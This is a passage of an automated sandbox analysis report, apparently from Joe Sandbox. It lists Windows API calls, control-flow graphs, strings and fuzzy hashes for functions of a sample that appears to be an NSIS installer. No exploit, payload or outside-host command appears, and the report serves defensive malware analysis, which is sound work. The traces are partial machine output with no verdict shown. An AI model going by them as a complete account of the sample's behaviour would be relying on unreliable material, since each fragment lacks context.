                                                                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                                                                                                                                                                                                                                      • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                      • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    • u+, xrefs: 00403632
                                                                                                                                                                                                                                                                                    • Error launching installer, xrefs: 00403603
                                                                                                                                                                                                                                                                                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                                                                                                                                                                                                                                                    • Inst, xrefs: 00403698
                                                                                                                                                                                                                                                                                    • soft, xrefs: 004036A1
                                                                                                                                                                                                                                                                                    • Null, xrefs: 004036AA
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                                                                                                                    • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$u+
                                                                                                                                                                                                                                                                                    • API String ID: 4283519449-3463419070
                                                                                                                                                                                                                                                                                    • Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                                                                                                                                                                    • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 654 40337f-403398 655 4033a1-4033a9 654->655 656 40339a 654->656 657 4033b2-4033b7 655->657 658 4033ab 655->658 656->655 659 4033c7-4033d4 call 403336 657->659 660 4033b9-4033c2 call 403368 657->660 658->657 664 4033d6 659->664 665 4033de-4033e5 659->665 660->659 666 4033d8-4033d9 664->666 667 403546-403548 665->667 668 4033eb-403432 GetTickCount 665->668 671 403567-40356b 666->671 669 40354a-40354d 667->669 670 4035ac-4035af 667->670 672 403564 668->672 673 403438-403440 668->673 674 403552-40355b call 403336 669->674 675 40354f 669->675 676 4035b1 670->676 677 40356e-403574 670->677 672->671 678 403442 673->678 679 403445-403453 call 403336 673->679 674->664 687 403561 674->687 675->674 676->672 682 403576 677->682 683 403579-403587 call 403336 677->683 678->679 679->664 688 403455-40345e 679->688 682->683 683->664 691 40358d-40359f WriteFile 683->691 687->672 690 403464-403484 call 4076a0 688->690 697 403538-40353a 690->697 698 40348a-40349d GetTickCount 690->698 693 4035a1-4035a4 691->693 694 40353f-403541 691->694 693->694 696 4035a6-4035a9 693->696 694->666 696->670 697->666 699 4034e8-4034ec 698->699 700 40349f-4034a7 698->700 701 40352d-403530 699->701 702 4034ee-4034f1 699->702 703 4034a9-4034ad 700->703 704 4034af-4034e0 MulDiv wsprintfW call 404f9e 700->704 701->673 708 403536 701->708 706 403513-40351e 702->706 707 4034f3-403507 WriteFile 702->707 703->699 703->704 709 4034e5 704->709 711 403521-403525 706->711 707->694 710 403509-40350c 707->710 708->672 709->699 710->694 712 40350e-403511 710->712 711->690 713 40352b 711->713 712->711 713->672
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 004033F1
                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00403492
                                                                                                                                                                                                                                                                                    • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 004034CE
                                                                                                                                                                                                                                                                                    • WriteFile.KERNELBASE(00000000,00000000,00424179,00403792,00000000), ref: 004034FF
                                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CountFileTickWrite$wsprintf
                                                                                                                                                                                                                                                                                    • String ID: (]C$... %d%%$pAB$yAB
                                                                                                                                                                                                                                                                                    • API String ID: 651206458-2023174797
                                                                                                                                                                                                                                                                                    • Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                                                                                                                                    • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 714 404f9e-404fb1 715 404fb7-404fca 714->715 716 40506e-405070 714->716 717 404fd5-404fe1 lstrlenW 715->717 718 404fcc-404fd0 call 406831 715->718 720 404fe3-404ff3 lstrlenW 717->720 721 404ffe-405002 717->721 718->717 722 404ff5-404ff9 lstrcatW 720->722 723 40506c-40506d 720->723 724 405011-405015 721->724 725 405004-40500b SetWindowTextW 721->725 722->721 723->716 726 405017-405059 SendMessageW * 3 724->726 727 40505b-40505d 724->727 725->724 726->727 727->723 728 40505f-405064 727->728 728->723
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(00445D80,00424179,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(004034E5,00445D80,00424179,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424179,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                    • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                      • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424179,74DF23A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2740478559-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                                                                                                                                                                    • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 729 401eb9-401ec4 730 401f24-401f26 729->730 731 401ec6-401ec9 729->731 732 401f53-401f7b GlobalAlloc call 406831 730->732 733 401f28-401f2a 730->733 734 401ed5-401ee3 call 4062cf 731->734 735 401ecb-401ecf 731->735 750 4030e3-4030f2 732->750 751 402387-40238d GlobalFree 732->751 736 401f3c-401f4e call 406035 733->736 737 401f2c-401f36 call 4062cf 733->737 747 401ee4-402702 call 406831 734->747 735->731 738 401ed1-401ed3 735->738 736->751 737->736 738->734 742 401ef7-402e50 call 406035 * 3 738->742 742->750 762 402708-40270e 747->762 751->750 762->750
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                    • GlobalFree.KERNELBASE(00000000), ref: 00402387
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FreeGloballstrcpyn
                                                                                                                                                                                                                                                                                    • String ID: %MxBearing%$Exch: stack < %d elements$Pop: stack empty
                                                                                                                                                                                                                                                                                    • API String ID: 1459762280-4223719792
                                                                                                                                                                                                                                                                                    • Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                                                                                                                                                                    • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 764 4022fd-402325 call 40145c GetFileVersionInfoSizeW 767 4030e3-4030f2 764->767 768 40232b-402339 GlobalAlloc 764->768 768->767 770 40233f-40234e GetFileVersionInfoW 768->770 772 402350-402367 VerQueryValueW 770->772 773 402384-40238d GlobalFree 770->773 772->773 774 402369-402381 call 405f7d * 2 772->774 773->767 774->773
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                                                                                                                                                                                    • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                                                                                                                                                                                    • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                                                                                                                                                                                      • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                    • GlobalFree.KERNELBASE(00000000), ref: 00402387
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3376005127-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                                                                                                                                    • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 780 402b23-402b37 GlobalAlloc 781 402b39-402b49 call 401446 780->781 782 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 780->782 787 402b70-402b73 781->787 782->787 788 402b93 787->788 789 402b75-402b8d call 405f96 WriteFile 787->789 791 4030e3-4030f2 788->791 789->788 795 402384-40238d GlobalFree 789->795 795->791
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2568930968-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                                                                                                                                    • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 797 402713-40273b call 406035 * 2 802 402746-402749 797->802 803 40273d-402743 call 40145c 797->803 805 402755-402758 802->805 806 40274b-402752 call 40145c 802->806 803->802 809 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 805->809 810 40275a-402761 call 40145c 805->810 806->805 810->809
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                                                                                                                                                                    • String ID: %MxBearing%$<RM>$WriteINIStr: wrote [%s] %s=%s in %s
                                                                                                                                                                                                                                                                                    • API String ID: 247603264-2396929154
                                                                                                                                                                                                                                                                                    • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                                                                                                                                    • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 818 405073-405091 OleInitialize call 403ddb 820 405096-405098 818->820 821 4050c7-4050de call 403ddb OleUninitialize 820->821 822 40509a 820->822 823 40509d-4050a3 822->823 825 4050e1-4050ec call 4062cf 823->825 826 4050a5-4050bf call 4062cf call 40139d 823->826 833 4050ed-4050f5 825->833 826->833 836 4050c1 826->836 833->823 835 4050f7 833->835 835->821 836->821
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 00405083
                                                                                                                                                                                                                                                                                      • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                    • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                                                                                                                                                                                    • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                                                                                                                                                                                    • API String ID: 2266616436-4211696005
                                                                                                                                                                                                                                                                                    • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                                                                                                                                    • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 837 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 848 402223-4030f2 call 4062cf 837->848 849 40220d-40221b call 4062cf 837->849 849->848
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424179,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424179,74DF23A0,00000000), ref: 00404FE6
